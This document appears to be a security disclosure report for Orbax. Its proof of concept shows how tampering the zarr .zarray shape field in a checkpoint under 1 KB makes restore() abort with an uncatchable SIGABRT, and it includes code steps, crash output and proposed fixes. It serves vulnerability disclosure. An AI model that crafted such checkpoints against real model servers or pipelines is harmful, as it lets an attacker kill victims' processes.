EnigmaConsultant's picture
Upload README.md with huggingface_hub
af55db5 verified
|
Raw
History Blame Contribute Delete
8.43 kB
# Orbax PyTreeCheckpointer restore: attacker-controlled zarr `.zarray` shape/chunks metadata drives an unbounded native allocation in tensorstore -> uncatchable `std::bad_alloc` -> `std::terminate` -> SIGABRT (process-abort DoS) from a <1 KB checkpoint
## Target
- **Project:** Orbax (`orbax-checkpoint`) — the Flax/JAX checkpoint library
- **Vulnerable version tested:** `orbax-checkpoint 0.12.1`
- **Toolchain (exact, verified):** `flax 0.12.7`, `orbax-checkpoint 0.12.1`, `jax 0.10.2`, `numpy 2.5.1`, `tensorstore 0.1.84`, Python 3.13, Linux x86_64
- **Attacker-reachable entry point:** `orbax.checkpoint.PyTreeCheckpointer().restore(dir)` (standard public loader API), consuming an untrusted on-disk checkpoint directory.
- **Vulnerability class:** Untrusted-metadata-driven unbounded allocation -> denial of service (uncatchable process abort). CWE-789 (Memory Allocation with Excessive Size Value) / CWE-248 (Uncaught Exception) / CWE-400 (Uncontrolled Resource Consumption).
## Summary
When an Orbax PyTree checkpoint is stored as plain (non-OCDBT) zarr, each leaf
array is opened through **tensorstore** using the on-disk zarr metadata file
`<leaf>/.zarray`. The `shape` and `chunks` fields of that JSON are **fully
attacker-controlled** and are passed straight through to tensorstore with **no
bound / sanity validation by orbax** — no cross-check against the actual amount
of stored data, no cap on total element count, no cap on chunk-grid cardinality.
tensorstore's C++ zarr driver then attempts to build native structures sized by
the *declared* geometry. For a single giant chunk it tries to allocate the full
per-chunk / output buffer (e.g. 156 TiB); for many tiny chunks it tries to
materialize a chunk-grid index structure of 10^12+ entries. Either way the
native allocation fails and throws C++ `std::bad_alloc`. That exception
propagates across a `noexcept` / terminate boundary in tensorstore's async/C++
layer, so it is **not** converted to a Python exception — `std::terminate()`
runs and the whole process is killed with **SIGABRT (exit 134)**.
Because it is a native abort, a Python `try/except Exception` around `restore()`
**cannot** catch it. An attacker who can get a victim to load an untrusted
checkpoint (a ubiquitous supply-chain scenario for shared model weights) can
hard-kill the victim process with a checkpoint under 1 KB on disk.
## Root cause
Orbax's array `TypeHandler` deserializes each leaf by opening it with
tensorstore using the on-disk zarr metadata verbatim. Conceptually:
```python
# orbax/checkpoint array TypeHandler -> tensorstore.open(spec)
# spec['metadata'] is read from <leaf>/.zarray with NO validation of
# shape / chunks against the actual stored byte count.
t = await ts.open(tspec) # tensorstore C++ zarr driver
result = await t.read() # allocates buffers sized by declared shape/chunks
```
The declared geometry is trusted. There is no check that
`prod(shape) * dtype_size` is anywhere near the bytes actually present on disk,
nor a cap on `prod(shape)` or on the number of chunks
`prod(ceil(shape[i]/chunks[i]))`. tensorstore honors the declared geometry and
attempts the corresponding native allocation, which fails with `std::bad_alloc`
inside a `noexcept` boundary -> `std::terminate` -> `SIGABRT`.
A fix belongs in **orbax** (validate/limit array metadata — total elements,
per-chunk bytes, chunk-grid cardinality — against the actual stored data before
calling `tensorstore.open`) and/or in **tensorstore** (surface a catchable error
instead of aborting the process on allocation failure).
## Proof of Concept
The PoC uses **only Orbax's own public API** to build a legitimate checkpoint,
tampers a single JSON field, then loads via the standard public loader.
1. Build a normal, benign checkpoint with Orbax itself (plain zarr, `use_ocdbt=False`):
```python
import numpy as np, orbax.checkpoint as ocp
tree = {"w": np.arange(6, dtype=np.float32).reshape(2, 3)}
h = ocp.PyTreeCheckpointHandler(use_ocdbt=False, use_zarr3=False)
ocp.Checkpointer(h).save(dir, tree)
```
Orbax writes the array metadata to `dir/w/.zarray` as JSON:
`{"chunks":[2,3],...,"shape":[2,3],"fill_value":null,...,"zarr_format":2}`.
2. Tamper **only** the `.zarray` `shape` field to an astronomically large value,
e.g. `shape=[6553600,6553600]` (chunks left at `[2,3]`, `fill_value` set to 0).
Total on-disk checkpoint size stays **~754 bytes**.
3. Load with the standard public API:
```python
ocp.PyTreeCheckpointer().restore(dir) # auto-detects plain-zarr; no handler args
```
Result: the Python process is aborted with **SIGABRT (exit 134)**, printing
`terminate called after throwing an instance of 'std::bad_alloc'`. The
`restore()` call was wrapped in `try/except Exception` and the post-`try`
line never executed — proving the abort is uncatchable.
PoC files (in this repo): `poc_final.py` (modes: `control` | `moderate` | `abort`),
`restore_test2.py`, and the mechanism harness `mech.py`.
## Captured evidence (verbatim, re-run for this report)
Environment:
```
flax 0.12.7 orbax-checkpoint 0.12.1 jax 0.10.2 numpy 2.5.1 tensorstore 0.1.84 (Python 3.13, Linux x86_64)
```
Clean reproduction via the public API:
```
======== CONTROL ========
$ python poc_final.py control -> control_exit=0
CONTROL: public restore OK, on-disk=723B, w.shape=(2, 3) sum=15.0
======== ABORT ========
$ python poc_final.py abort -> abort_exit=134
ABORT: on-disk=754B declares 156.2 TiB; wrapping restore in try/except Exception...
terminate called after throwing an instance of 'std::bad_alloc'
what(): std::bad_alloc
(the lines "ABORT: caught ..." and "ABORT: reached line after try/except" were
NEVER printed -> the abort is uncatchable by Python try/except Exception)
```
Mechanism confirmed across three independent metadata variants, all via the
public `ocp.PyTreeCheckpointer().restore()`:
```
A: shape=[6553600,6553600] chunks=[2,3] -> exit=134 std::bad_alloc / terminate (huge shape, tiny chunks -> giant chunk grid)
B: shape=[6553600,6553600] chunks=[6553600,6553600] -> exit=134 std::bad_alloc / terminate (single giant 156 TiB chunk buffer)
C: shape=[100000000000] chunks=[1] -> exit=134 std::bad_alloc / terminate (1-D, 10^11-entry chunk grid)
```
Negative control — the exact same checkpoint with the original, untouched
`.zarray` (only difference: `shape`):
```
{"chunks":[2,3],...,"fill_value":null,...,"shape":[2,3],"zarr_format":2} -> restores fine, exit 0, w.shape=(2,3), sum=15.0
```
The **only** attacker change between "clean load" and "process abort" is the
`.zarray` `shape` field (`[2,3]` -> `[6553600,6553600]`, with `fill_value`
`null`->`0`). On-disk checkpoint size is unchanged at ~750 bytes.
## Impact
- **Denial of service via process abort.** Loading a single untrusted checkpoint
(< 1 KB) hard-kills the loading process with SIGABRT. The abort originates in
native C++ and is **uncatchable** from Python, so defensive
`try/except Exception` around `restore()` provides no protection — the entire
host process (e.g. a model server, training job, or inference worker) dies.
- **Realistic delivery.** Sharing pretrained checkpoints/weights is the norm in
the JAX/Flax ecosystem; a malicious or tampered checkpoint is a plausible
supply-chain vector. The malicious payload is a single-field edit to a plain
JSON metadata file, indistinguishable in size from a benign checkpoint.
## Dedup / prior-art note
- Distinct from the msgpack tuple-recursion segfault in Orbax
(`huntr-poc-orbax-msgpack-tuple-recursion-segfault`): that abuses the msgpack
tree structure; this abuses the zarr array `.zarray` `shape`/`chunks`
geometry driving a native allocation in tensorstore. Different code path,
different sink, different crash signature (`std::bad_alloc`/SIGABRT vs
recursion segfault).
- Distinct from the netCDF/nczarr `.zarray`/`chunks` findings — different
library and native stack (libnetcdf C vs tensorstore C++), different entry
point (`orbax` PyTree loader).
- No known CVE at time of writing assigns this Orbax->tensorstore
untrusted-`.zarray`-shape path a process-abort DoS. The root-cause fix
location (orbax validating array metadata before `tensorstore.open`, and/or
tensorstore raising a catchable error on allocation failure) is reported here.